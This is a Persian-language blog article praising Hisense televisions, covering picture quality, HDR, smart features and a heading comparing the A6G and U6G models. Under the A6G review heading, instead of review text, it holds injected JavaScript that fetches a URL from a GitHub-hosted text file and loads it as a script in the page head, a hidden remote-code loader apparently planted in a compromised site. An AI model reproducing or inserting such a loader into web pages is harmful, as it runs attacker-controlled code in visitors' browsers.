دسته‌بندی نشده

نگاهی به تلویزیون های هایسنس

تلویزیون های هایسنس نسبت به قیمت مناسبی که دارند از ویژگی ها و تکنولوژی های فوق العاده ای بهرمند می باشند. این برند نسبت به برند های بزرگ جهانی مانند سامسونگ, سونی و یا ال جی چندان برجسته نمی باشد اما توانسته است با قابلیت های جذاب خود طرفداران زیادی را بدست اورد. هایسنس قرار است در سال 2022 تلویزیون های مختلف با ویژگی های فوق العاده ای را ارائه دهد. تلویزیون های بالا رده این کمپانی در سال جدید مانند U80G با پنل ULED با کیفیت تصویر 8K و ویژگی های برجسته ارائه خواهد شد. 

چرا باید تلویزیون های هایسنس را خریداری کرد

تلویزیون های هایسنس به قیمت مناسب و ارزانشان معروف شده اند. درحالی که این برند تلویزیون های ممتاز با تکنولوژی های عالی را ارائه داده است همچنین در مقایسه با برند های بزرگ تر قیمت مناسبی را برای محصولاتش در نظر می گیرد. بنابراین اگر تلویزیونی با قابلیت HDR و کیفیت تصویر 4K را در نظر دارید می توانید با قیمت بسیار مناسب در بین تلویزیون های هایسنس گزینه مورد نیاز خود را انتخاب کنید.
موردی که بسیار حائز اهمیت است این است که تنها به دلیل قیمت مناسبی که این تلویزیون ها دارند نمی توان گفت که با تلویزیون های بالا رده از کمپانی هایی مانند سامسونگ و یا سونی قابل مقایسه نمی باشند چراکه در ان ها ویژگی های بسیار کاربر پسند و کاربردی یافت می شود.  تولیدات این کمپانی بیشتر در دسته میان رده قرار می گیرند اما در سال 2021 هایسنس اولین تلویزیون 8K خود را با پنل ULED بنام U80G عرضه کرد. این تلویزیون در مقایسه با تلویزیون های پرچمدار می تواند تجربه دیداری بی نظیر و همچنین تصاویری فوق العاده را ارائه دهد. 

ویژگی ها

اساسا پنل های استفاده شده برای تلویزیون های هایسنس فوق العاده هستند. این پنل ها اغلب تصاویری عالی با سطح رنگ مشکی بی نظیر و رنگ های بسیار زیبا و طبیعی را ارائه می دهند.
تلویزیون های این برند از قابلیت HDR پشتیبانی می کنند و دارای روشنایی بسیار عالی می باشند. تلویزیون های پرچمدار از کمپانی هایسنس دارای ویژگی های تصویری عالی می باشند. تلویزیون بالا رده 8K این برند می تواند بهترین ویژگی ها را ارائه دهند. این محصول تصاویر را با وضوح عالی پخش خواهد کرد.
تلویزیون های DualCell هایسنس نیز می توانند رنگ هایی عمیق و کاملا طبیعی با جلوه ای بی نظیر را پخش کنند و تصاویر با کیفیت فورکی بر روی ان ها ارائه می شوند.
در اغلب تلویزیون های هایسنس کیفیت تصویر فورکی با قابلیت ها و تکنولوژی های جذاب استفاده می شود. تصاویر در اغلب مدل ها به صورت واقعی و زنده پخش می شوند و تکنولوژی های پیشرفته تصویری نیز به ارتقا کیفیت و وضوح ان ها کمک بسیاری می کند. هایسنس تلویزیون های خود را بر پایه پنل LED عرضه می کند بنابراین زاویه دید گسترده بر روی ان ها ارائه می شود و همچنین انعکاس و بازتاب در ان ها بسیار عالی کنترل می شود. پردازشگر Hi-View در این تلویزیون ها باعث ایجاد تجربه بی نظیر و فوق العاده در نمایش خواهد شد. 

قابلیت های هوشمند

تلویزیون های هاسیسنس اغلب با پلتفرم اختصاصی VIDAU ارائه می شوند و در برخی از محصولات سیستم عامل اندروید نیز بکار می رود. در این تلویزیون های قابلیت های هوشمند بسیار زیادی وجود دارد و مانند برند های نام دار جهانی می تواند تلویزیون های اسمارت بی نظیری را به کاربران ارائه کند. دسترسی به اینترنت در این تلویزیون های به اسانی صورت می گیرد و امکان وب گردی و دسترسی به محتویات با سرعت بالا روی ان ها انجام می گیرد. قابلیت هایی مانند انتقال محتوا گوشی های هوشمند و سایر دستگاه های دیجیتالی به صورت اسمارت بر روی تلویزیون های این برند فراهم می باشد . در این محصولات همچنین امکان اجرا دستورات صوتی و انجام تنظیمات با صدا فراهم می باشد. 

مقایسه تلویزیون های هایسنس مدل A6G و U6G

بررسی تلویزیون هایسنس مدل A6G

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *